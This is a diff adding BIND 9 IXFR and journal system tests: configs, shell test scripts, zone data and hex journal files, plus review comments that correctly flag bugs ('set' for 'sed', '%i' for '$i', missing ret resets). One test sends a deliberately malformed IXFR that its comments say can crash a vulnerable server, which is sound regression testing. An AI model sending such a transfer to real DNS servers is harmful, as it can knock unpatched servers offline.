@@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + provide-ixfr no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view "primary" { + ixfr-from-differences yes; + request-ixfr yes; + zone "test" IN { + type secondary; + file "mytest.db"; + primaries { 10.53.0.3; }; + }; + zone "sub.test" IN { + type secondary; + file "subtest.db"; + request-ixfr no; + primaries { 10.53.0.3; }; + }; +}; diff --git a/bin/tests/system/ixfr/prereq.sh b/bin/tests/system/ixfr/prereq.sh new file mode 100644 index 0000000..ec369f8 --- /dev/null +++ b/bin/tests/system/ixfr/prereq.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi 
diff --git a/bin/tests/system/ixfr/setup.sh b/bin/tests/system/ixfr/setup.sh new file mode 100644 index 0000000..c84c950 --- /dev/null +++ b/bin/tests/system/ixfr/setup.sh @@ -0,0 +1,69 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf + +# Set up db files for zone "test" - this is a series of four +# versions of the zone, the second and third having small changes +# and the fourth having a large one. + +testdb () { + cat << EOF +\$ORIGIN $1 +\$TTL 15 +@ 15 IN SOA ns1.test. hostmaster.test. ( + $2 ; serial + 3H ; refresh + 15 ; retry + 1w ; expire + 3h ; minimum + ) + IN NS ns1.test. + IN NS ns2.test. + IN NS ns5.test. +ns1 IN A 10.53.0.3 +ns2 IN A 10.53.0.4 +ns5 IN A 10.53.0.5 +EOF + + i=0 + while [ $i -lt $3 ]; do + echo "host$i IN A 192.0.2.$i" + i=$((i+1)) + done +} + +testdb test. 1 60 > ns3/mytest.db +testdb test. 2 61 > ns3/mytest1.db +testdb test. 3 62 > ns3/mytest2.db +testdb test. 4 0 > ns3/mytest3.db + +# Set up similar db files for sub.test, which will have IXFR disabled +testdb sub.test. 1 60 > ns3/subtest.db +testdb sub.test. 3 61 > ns3/subtest1.db + +# Set up a large zone +i=0 +$SHELL ../genzone.sh 3 > ns3/large.db +while [ $i -lt 10000 ]; do + echo "record$i 10 IN TXT this is record %i" >> ns3/large.db + i=$((i+1)) +done 
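Review bot: In the loop that fills ns3/large.db, the TXT text ends in `%i`, which `echo` writes literally, so all 10000 records carry the identical string "this is record %i". The owner name already uses `$i`, so the text presumably meant the same: `echo "record$i 10 IN TXT this is record $i" >> ns3/large.db`. The zone still loads either way, but distinct record data makes a transfer dump easier to check by eye. A short comment on testdb() naming its three arguments (origin, serial, number of host records) would also help, since the `testdb test. 4 0` call is otherwise hard to read.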
diff --git a/bin/tests/system/ixfr/tests.sh b/bin/tests/system/ixfr/tests.sh new file mode 100644 index 0000000..1d37b45 --- /dev/null +++ b/bin/tests/system/ixfr/tests.sh 
@@ -0,0 +1,412 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# WARNING: The test labelled "testing request-ixfr option in view vs zone" +# is fragile because it depends upon counting instances of records +# in the log file - need a better approach <sdm> - until then, +# if you add any tests above that point, you will break the test. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +wait_for_serial() ( + $DIG $DIGOPTS "@$1" "$2" SOA > "$4" + serial=$(awk '$4 == "SOA" { print $7 }' "$4") + [ "$3" -eq "${serial:--1}" ] +) + +status=0 +n=0 + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +SENDCMD="$PERL ../send.pl 10.53.0.2 ${EXTRAPORT1}" +RNDCCMD="$RNDC -p ${CONTROLPORT} -c ../common/rndc.conf -s" + +n=$((n+1)) +echo_i "testing initial AXFR ($n)" +ret=0 + +$SENDCMD <<EOF +/SOA/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +/AXFR/ +nil. 300 NS ns.nil. +nil. 300 TXT "initial AXFR" +a.nil. 60 A 10.0.0.61 +b.nil. 60 A 10.0.0.62 +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +EOF + +sleep 1 + +# Initially, ns1 is not authoritative for anything (see setup.sh). +# Now that ans is up and running with the right data, we make it +# a secondary for nil. + +cat <<EOF >>ns1/named.conf +zone "nil" { + type secondary; + file "myftp.db"; + primaries { 10.53.0.2; }; +}; +EOF + +rndc_reload ns1 10.53.0.1 + +retry_quiet 10 wait_for_serial 10.53.0.1 nil. 1 dig.out.test$n || ret=1 + +$DIG $DIGOPTS @10.53.0.1 nil. 
TXT | grep 'initial AXFR' >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing successful IXFR ($n)" +ret=0 + +# We change the IP address of a.nil., and the TXT record at the apex. +# Then we do a SOA-only update. + +$SENDCMD <<EOF +/SOA/ +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +/IXFR/ +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +a.nil. 60 A 10.0.0.61 +nil. 300 TXT "initial AXFR" +nil. 300 SOA ns.nil. root.nil. 2 300 300 604800 300 +nil. 300 TXT "successful IXFR" +a.nil. 60 A 10.0.1.61 +nil. 300 SOA ns.nil. root.nil. 2 300 300 604800 300 +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +EOF + +sleep 1 + +$RNDCCMD 10.53.0.1 refresh nil | sed 's/^/ns1 /' | cat_i + +sleep 2 + +$DIG $DIGOPTS @10.53.0.1 nil. TXT | grep 'successful IXFR' >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing AXFR fallback after IXFR failure (not exact error) ($n)" +ret=0 + +# Provide a broken IXFR response and a working fallback AXFR response + +$SENDCMD <<EOF +/SOA/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/IXFR/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +nil. 300 TXT "delete-nonexistent-txt-record" +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +nil. 300 TXT "this-txt-record-would-be-added" +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +/AXFR/ +nil. 300 NS ns.nil. +nil. 300 TXT "fallback AXFR" +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +EOF + +sleep 1 + +$RNDCCMD 10.53.0.1 refresh nil | sed 's/^/ns1 /' | cat_i + +sleep 2 + +$DIG $DIGOPTS @10.53.0.1 nil. 
TXT | grep 'fallback AXFR' >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing AXFR fallback after IXFR failure (bad SOA owner) ($n)" +ret=0 + +# Prepare for checking the logs later on. +nextpart ns1/named.run >/dev/null + +# Provide a broken IXFR response and a working fallback AXFR response. +$SENDCMD <<EOF +/SOA/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/IXFR/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +bad-owner. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +test.nil. 300 TXT "serial 4, malformed IXFR" +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/AXFR/ +nil. 300 NS ns.nil. +test.nil. 300 TXT "serial 4, fallback AXFR" +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +EOF +$RNDCCMD 10.53.0.1 refresh nil | sed 's/^/ns1 /' | cat_i + +# A broken server would accept the malformed IXFR and apply its contents to the +# zone. A fixed one would reject the IXFR and fall back to AXFR. Both IXFR and +# AXFR above bring the nil. zone up to serial 4, but we cannot reliably query +# for the SOA record to check whether the transfer was finished because a broken +# server would send back SERVFAIL responses to SOA queries after accepting the +# malformed IXFR. Instead, check transfer progress by querying for a TXT record +# at test.nil. which is present in both IXFR and AXFR (with different contents). +_wait_until_transfer_is_finished() { + $DIG $DIGOPTS +tries=1 +time=1 @10.53.0.1 test.nil. TXT > dig.out.test$n.1 && + grep -q -F "serial 4" dig.out.test$n.1 +} +if ! retry_quiet 10 _wait_until_transfer_is_finished; then + echo_i "timed out waiting for version 4 of zone nil. to be transferred" + ret=1 +fi + +# At this point a broken server would be serving a zone with no SOA records. +# Try crashing it by triggering a SOA refresh query. 
+$RNDCCMD 10.53.0.1 refresh nil | sed 's/^/ns1 /' | cat_i + +# Do not wait until the zone refresh completes - even if a crash has not +# happened by now, a broken server would never serve the record which is only +# present in the fallback AXFR, so checking for that is enough to verify if a +# server is broken or not; if it is, it is bound to crash shortly anyway. +$DIG $DIGOPTS test.nil. TXT @10.53.0.1 > dig.out.test$n.2 || ret=1 +grep -q -F "serial 4, fallback AXFR" dig.out.test$n.2 || ret=1 + +# Ensure the expected error is logged. +nextpart ns1/named.run | grep -q -F "SOA name mismatch" || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences option ($n)" +# ns3 is primary; ns4 is secondary +$CHECKZONE test. ns3/mytest.db > /dev/null 2>&1 +if [ $? -ne 0 ] +then + echo_i "named-checkzone returned failure on ns3/mytest.db" +fi + +retry_quiet 10 wait_for_serial 10.53.0.4 test. 1 dig.out.test$n || ret=1 + +nextpart ns4/named.run > /dev/null + +# modify the primary +sleep 1 +cp ns3/mytest1.db ns3/mytest.db +$RNDCCMD 10.53.0.3 reload | sed 's/^/ns3 /' | cat_i + +# wait for primary to reload +retry_quiet 10 wait_for_serial 10.53.0.3 test. 2 dig.out.test$n || ret=1 + +# wait for secondary to reload +tret=0 +retry_quiet 5 wait_for_serial 10.53.0.4 test. 2 dig.out.test$n || tret=1 +if [ $tret -eq 1 ]; then + # re-noitfy after 5 seconds, then wait another 10 + $RNDCCMD 10.53.0.3 notify test | set 's/^/ns3 /' | cat_i + retry_quiet 10 wait_for_serial 10.53.0.4 test. 2 dig.out.test$n || ret=1 +fi + +wait_for_log 10 'got incremental' ns4/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing 'request-ixfr no' option inheritance from view ($n)" +ret=0 +# There's a view with 2 zones. 
In the view, "request-ixfr yes" +# but in the zone "sub.test", request-ixfr no" +# we want to make sure that a change to sub.test results in AXFR, while +# changes to test. result in IXFR + +sleep 1 +cp ns3/subtest1.db ns3/subtest.db # change to sub.test zone, should be AXFR +nextpart ns4/named.run > /dev/null +$RNDCCMD 10.53.0.3 reload | sed 's/^/ns3 /' | cat_i + +# wait for primary to reload +retry_quiet 10 wait_for_serial 10.53.0.3 sub.test. 3 dig.out.test$n || ret=1 + +# wait for secondary to reload +tret=0 +retry_quiet 5 wait_for_serial 10.53.0.4 sub.test. 3 dig.out.test$n || tret=1 +if [ $tret -eq 1 ]; then + # re-noitfy after 5 seconds, then wait another 10 + $RNDCCMD 10.53.0.3 notify sub.test | set 's/^/ns3 /' | cat_i + retry_quiet 10 wait_for_serial 10.53.0.4 sub.test. 3 dig.out.test$n || ret=1 +fi + +wait_for_log 10 'got nonincremental response' ns4/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing 'request-ixfr yes' option inheritance from view ($n)" +ret=0 +sleep 1 +cp ns3/mytest2.db ns3/mytest.db # change to test zone, should be IXFR +nextpart ns4/named.run > /dev/null +$RNDCCMD 10.53.0.3 reload | sed 's/^/ns3 /' | cat_i + +# wait for primary to reload +retry_quiet 10 wait_for_serial 10.53.0.3 test. 3 dig.out.test$n || ret=1 + +# wait for secondary to reload +tret=0 +retry_quiet 5 wait_for_serial 10.53.0.4 test. 3 dig.out.test$n || tret=1 +if [ $tret -eq 1 ]; then + # re-noitfy after 5 seconds, then wait another 10 + $RNDCCMD 10.53.0.3 notify test | set 's/^/ns3 /' | cat_i + retry_quiet 10 wait_for_serial 10.53.0.4 test. 3 dig.out.test$n || ret=1 +fi + +wait_for_log 10 'got incremental response' ns4/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "testing DiG's handling of a multi message AXFR style IXFR response ($n)" +( +(sleep 10 && kill $$) 2>/dev/null & +sub=$! 
+$DIG -p ${PORT} ixfr=0 large @10.53.0.3 > dig.out.test$n +kill $sub +) +lines=`grep hostmaster.large dig.out.test$n | wc -l` +test ${lines:-0} -eq 2 || ret=1 +messages=`sed -n 's/^;;.*messages \([0-9]*\),.*/\1/p' dig.out.test$n` +test ${messages:-0} -gt 1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "test 'dig +notcp ixfr=<value>' vs 'dig ixfr=<value> +notcp' vs 'dig ixfr=<value>' ($n)" +ret=0 +# Should be "switch to TCP" response +$DIG $DIGOPTS +notcp ixfr=1 test @10.53.0.4 > dig.out1.test$n || ret=1 +$DIG $DIGOPTS ixfr=1 +notcp test @10.53.0.4 > dig.out2.test$n || ret=1 +digcomp dig.out1.test$n dig.out2.test$n || ret=1 +awk '$4 == "SOA" { soacnt++} END {if (soacnt == 1) exit(0); else exit(1);}' dig.out1.test$n || ret=1 +awk '$4 == "SOA" { if ($7 == 3) exit(0); else exit(1);}' dig.out1.test$n || ret=1 +# +nextpart ns4/named.run > /dev/null +# Should be incremental transfer. +$DIG $DIGOPTS ixfr=1 test @10.53.0.4 > dig.out3.test$n || ret=1 +awk '$4 == "SOA" { soacnt++} END { if (soacnt == 6) exit(0); else exit(1);}' dig.out3.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check estimated IXFR size ($n)" +ret=0 +# note IXFR delta size will be slightly bigger with version 1 transaction +# headers as there is no correction for the overall record length storage. +# Ver1 = 4 * (6 + 10 + 10 + 17 + 5 * 4) + 2 * (13 + 10 + 4) + (6 * 4) = 330 +# Ver2 = 4 * (6 + 10 + 10 + 17 + 5 * 4) + 2 * (13 + 10 + 4) = 306 +nextpart ns4/named.run | grep "IXFR delta size (306 bytes)" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# make sure ns5 has transfered the zone +# wait for secondary to reload +tret=0 +retry_quiet 5 wait_for_serial 10.53.0.5 test. 
4 dig.out.test$n || tret=1 +if [ $tret -eq 1 ]; then + # re-noitfy after 5 seconds, then wait another 10 + $RNDCCMD 10.53.0.3 notify test | set 's/^/ns3 /' | cat_i + retry_quiet 10 wait_for_serial 10.53.0.5 test. 3 dig.out.test$n || ret=1 +fi + +n=$((n+1)) +echo_i "test 'provide-ixfr no;' (serial < current) ($n)" +ret=0 +nextpart ns5/named.run > /dev/null +# Should be "AXFR style" response +$DIG $DIGOPTS ixfr=1 test @10.53.0.5 > dig.out1.test$n || ret=1 +# Should be "switch to TCP" response +$DIG $DIGOPTS ixfr=1 +notcp test @10.53.0.5 > dig.out2.test$n || ret=1 +awk '$4 == "SOA" { soacnt++} END {if (soacnt == 2) exit(0); else exit(1);}' dig.out1.test$n || ret=1 +awk '$4 == "SOA" { soacnt++} END {if (soacnt == 1) exit(0); else exit(1);}' dig.out2.test$n || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking whether dig calculates IXFR statistics correctly ($n)" +ret=0 +$DIG $DIGOPTS +noedns +stat -b 10.53.0.4 @10.53.0.4 test. ixfr=2 > dig.out1.test$n +get_dig_xfer_stats dig.out1.test$n > stats.dig +diff ixfr-stats.good stats.dig > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Note: in the next two tests, we use ns4 logs for checking both incoming and +# outgoing transfer statistics as ns4 is both a secondary server (for ns3) and a +# primary server (for dig queries from the previous test) for "test". 
+ +_wait_for_stats () { + get_named_xfer_stats ns4/named.run "$1" test "$2" > "$3" + diff ixfr-stats.good "$3" > /dev/null || return 1 + return 0 +} + +n=$((n+1)) +echo_i "checking whether named calculates incoming IXFR statistics correctly ($n)" +ret=0 +retry_quiet 10 _wait_for_stats 10.53.0.3 "Transfer completed" stats.incoming || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking whether named calculates outgoing IXFR statistics correctly ($n)" +retry_quiet 10 _wait_for_stats 10.53.0.4 "IXFR ended" stats.outgoing || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "testing fallback to AXFR when max-ixfr-ratio is exceeded ($n)" +nextpart ns4/named.run > /dev/null + +sleep 1 +cp ns3/mytest3.db ns3/mytest.db # change to test zone, too big for IXFR +$RNDCCMD 10.53.0.3 reload | sed 's/^/ns3 /' | cat_i + +# wait for secondary to reload +tret=0 +retry_quiet 5 wait_for_serial 10.53.0.4 test. 4 dig.out.test$n || tret=1 +if [ $tret -eq 1 ]; then + # re-noitfy after 5 seconds, then wait another 10 + $RNDCCMD 10.53.0.3 notify test | set 's/^/ns3 /' | cat_i + retry_quiet 10 wait_for_serial 10.53.0.4 test. 4 dig.out.test$n || ret=1 +fi + +wait_for_log 10 'got nonincremental response' ns4/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/journal/clean.sh b/bin/tests/system/journal/clean.sh new file mode 100644 index 0000000..adab870 --- /dev/null +++ b/bin/tests/system/journal/clean.sh 
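Review bot: The five re-notify fallbacks pipe rndc through `set 's/^/ns3 /'` instead of `sed`, so the builtin ignores its input and cat_i receives nothing; any rndc error on exactly the path taken when a transfer is already late is therefore lost from the test log. Each of them should read like the reload lines above it, e.g. `$RNDCCMD 10.53.0.3 notify test | sed 's/^/ns3 /' | cat_i` (and `notify sub.test` in the request-ixfr stanza). In addition, the "ixfr-from-differences" and "outgoing IXFR statistics" stanzas never reset `ret=0`, so a failure in the preceding stanza is added to `status` a second time. The ns5 wait before the "provide-ixfr no" test first waits for serial 4 and then for serial 3, and any `ret=1` it sets is overwritten by the next `ret=0`, so that wait cannot fail the run as written.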
@@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */*.db */*.jnl +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f dig.out* +rm -f journalprint.out.* +rm -f ns1/managed-keys.bind +rm -f ns2/managed-keys.bind +rm -f tmp.jnl diff --git a/bin/tests/system/journal/ns1/changed.ver1.jnl.saved b/bin/tests/system/journal/ns1/changed.ver1.jnl.saved Binary files differnew file mode 100644 index 0000000..b449a7d --- /dev/null +++ b/bin/tests/system/journal/ns1/changed.ver1.jnl.saved diff --git a/bin/tests/system/journal/ns1/changed.ver2.jnl.saved b/bin/tests/system/journal/ns1/changed.ver2.jnl.saved Binary files differnew file mode 100644 index 0000000..d2fa199 --- /dev/null +++ b/bin/tests/system/journal/ns1/changed.ver2.jnl.saved diff --git a/bin/tests/system/journal/ns1/d1212.jnl.saved b/bin/tests/system/journal/ns1/d1212.jnl.saved Binary files differnew file mode 100644 index 0000000..57c1497 --- /dev/null +++ b/bin/tests/system/journal/ns1/d1212.jnl.saved diff --git a/bin/tests/system/journal/ns1/d2121.jnl.saved b/bin/tests/system/journal/ns1/d2121.jnl.saved Binary files differnew file mode 100644 index 0000000..ec21372 --- /dev/null +++ b/bin/tests/system/journal/ns1/d2121.jnl.saved diff --git a/bin/tests/system/journal/ns1/generic.db.in b/bin/tests/system/journal/ns1/generic.db.in new file mode 100644 index 0000000..55669d7 --- /dev/null +++ b/bin/tests/system/journal/ns1/generic.db.in 
@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2012010901 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +addr1 A 10.53.0.1 diff --git a/bin/tests/system/journal/ns1/ixfr.db.in b/bin/tests/system/journal/ns1/ixfr.db.in new file mode 100644 index 0000000..0cb1184 --- /dev/null +++ b/bin/tests/system/journal/ns1/ixfr.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2012010902 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +addr1 A 10.53.0.1 +addr2 A 10.53.0.2 diff --git a/bin/tests/system/journal/ns1/ixfr.ver1.jnl.saved b/bin/tests/system/journal/ns1/ixfr.ver1.jnl.saved Binary files differnew file mode 100644 index 0000000..10b5116 --- /dev/null +++ b/bin/tests/system/journal/ns1/ixfr.ver1.jnl.saved diff --git a/bin/tests/system/journal/ns1/managed-keys.bind.in b/bin/tests/system/journal/ns1/managed-keys.bind.in new file mode 100644 index 0000000..923e98b --- /dev/null +++ b/bin/tests/system/journal/ns1/managed-keys.bind.in 
@@ -0,0 +1,2 @@ +. 0 IN SOA . . 3297 0 0 0 0 +. 0 IN TYPE65533 \# 276 60621140598E0A83000000000101030803010001ACFFB409BCC939F8 31F7A1E5EC88F7A59255EC53040BE432027390A4CE896D6F9086F3C5 E177FBFE118163AAEC7AF1462C47945944C4E2C026BE5E98BBCDED25 978272E1E3E079C5094D573F0E83C92F02B32D3513B1550B826929C8 0DD0F92CAC966D17769FD5867B647C3F38029ABDC48152EB8F207159 ECC5D232C7C1537C79F4B7AC28FF11682F21681BF6D6ABA555032BF6 F9F036BEB2AAA5B3778D6EEBFBA6BF9EA191BE4AB0CAEA759E2F773A 1F9029C73ECB8D5735B9321DB085F1B8E2D8038FE2941992548CEE0D 67DD4547E11DD63AF9C9FC1C5466FB684CF009D7197C2CF79E792AB5 01E6A8A1CA519AF2CB9B5F6367E94C0D47502451357BE1B5 diff --git a/bin/tests/system/journal/ns1/managed-keys.bind.jnl.in b/bin/tests/system/journal/ns1/managed-keys.bind.jnl.in new file mode 100644 index 0000000..a63f91c --- /dev/null +++ b/bin/tests/system/journal/ns1/managed-keys.bind.jnl.in 
@@ -0,0 +1,704 @@ +3b42494e44204c4f472056390a000000 +00000cd20000020000000ce200002bf8 +00000038000000000000000000000000 +00000000000000000000000000000000 +00000cd20000020000000cd30000049c +00000cd40000073800000cd5000009d8 +00000cd600000c7800000cd700000f18 +00000cd8000011b800000cd900001458 +00000cda000016f800000cdb00001998 +00000cdc00001c3800000cdd00001ed8 +00000cde0000217800000cdf00002418 +00000ce0000026b800000cecd200000cd300000021 +0000060001000000000016000000000c +d2000000000000000000000000000000 +000000011f00fffd0001000000000114 +6058a4c2598e0a830000000001010308 +03010001acffb409bcc939f831f7a1e5 +ec88f7a59255ec53040be432027390a4 +ce896d6f9086f3c5e177fbfe118163aa +ec7af1462c47945944c4e2c026be5e98 +bbcded25978272e1e3e079c5094d573f +0e83c92f02b32d3513b1550b826929c8 +0dd0f92cac966d17769fd5867b647c3f +38029abdc48152eb8f207159ecc5d232 +c7c1537c79f4b7ac28ff11682f21681b +f6d6aba555032bf6f9f036beb2aaa5b3 +778d6eebfba6bf9ea191be4ab0caea75 +9e2f773a1f9029c73ecb8d5735b9321d +b085f1b8e2d8038fe2941992548cee0d +67dd4547e11dd63af9c9fc1c5466fb68 +4cf009d7197c2cf79e792ab501e6a8a1 +ca519af2cb9b5f6367e94c0d47502451 +357be1b5000000210000060001000000 +000016000000000cd300000000000000 +0000000000000000000000011f00fffd +00010000000001146058e4a0598e0a83 +000000000101030803010001acffb409 +bcc939f831f7a1e5ec88f7a59255ec53 +040be432027390a4ce896d6f9086f3c5 +e177fbfe118163aaec7af1462c479459 +44c4e2c026be5e98bbcded25978272e1 +e3e079c5094d573f0e83c92f02b32d35 +13b1550b826929c80dd0f92cac966d17 +769fd5867b647c3f38029abdc48152eb +8f207159ecc5d232c7c1537c79f4b7ac +28ff11682f21681bf6d6aba555032bf6 +f9f036beb2aaa5b3778d6eebfba6bf9e +a191be4ab0caea759e2f773a1f9029c7 +3ecb8d5735b9321db085f1b8e2d8038f +e2941992548cee0d67dd4547e11dd63a +f9c9fc1c5466fb684cf009d7197c2cf7 +9e792ab501e6a8a1ca519af2cb9b5f63 +67e94c0d47502451357be1b500000290 +00000cd300000cd40000002100000600 +01000000000016000000000cd3000000 +00000000000000000000000000000001 +1f00fffd00010000000001146058e4a0 +598e0a83000000000101030803010001 
+acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 +978272e1e3e079c5094d573f0e83c92f +02b32d3513b1550b826929c80dd0f92c +ac966d17769fd5867b647c3f38029abd +c48152eb8f207159ecc5d232c7c1537c +79f4b7ac28ff11682f21681bf6d6aba5 +55032bf6f9f036beb2aaa5b3778d6eeb +fba6bf9ea191be4ab0caea759e2f773a +1f9029c73ecb8d5735b9321db085f1b8 +e2d8038fe2941992548cee0d67dd4547 +e11dd63af9c9fc1c5466fb684cf009d7 +197c2cf79e792ab501e6a8a1ca519af2 +cb9b5f6367e94c0d47502451357be1b5 +00000021000006000100000000001600 +0000000cd40000000000000000000000 +00000000000000011f00fffd00010000 +000001146059f642598e0a8300000000 +0101030803010001acffb409bcc939f8 +31f7a1e5ec88f7a59255ec53040be432 +027390a4ce896d6f9086f3c5e177fbfe +118163aaec7af1462c47945944c4e2c0 +26be5e98bbcded25978272e1e3e079c5 +094d573f0e83c92f02b32d3513b1550b +826929c80dd0f92cac966d17769fd586 +7b647c3f38029abdc48152eb8f207159 +ecc5d232c7c1537c79f4b7ac28ff1168 +2f21681bf6d6aba555032bf6f9f036be +b2aaa5b3778d6eebfba6bf9ea191be4a +b0caea759e2f773a1f9029c73ecb8d57 +35b9321db085f1b8e2d8038fe2941992 +548cee0d67dd4547e11dd63af9c9fc1c +5466fb684cf009d7197c2cf79e792ab5 +01e6a8a1ca519af2cb9b5f6367e94c0d +47502451357be1b50000029000000cd4 +00000cd5000000000000002100000600 +01000000000016000000000cd4000000 +00000000000000000000000000000001 +1f00fffd00010000000001146059f642 +598e0a83000000000101030803010001 +acffb409bcc939f831f7a1e5ec88f7a5 +9255ec53040be432027390a4ce896d6f +9086f3c5e177fbfe118163aaec7af146 +2c47945944c4e2c026be5e98bbcded25 